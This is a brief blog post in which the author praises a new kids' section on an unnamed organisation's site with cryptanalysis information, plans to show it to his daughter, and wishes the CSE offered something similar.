More interesting is the section they now have for kids. I was quite impressed with it. Lots of neat information for the budding cryptanalyst. I am going to have my daughter check it out when she gets home from school today. She might enjoy it.

I only wish the CSE would do stuff like this. *sigh*

Posted by SilverStr at 11:44 AM | Comments (2) | TrackBack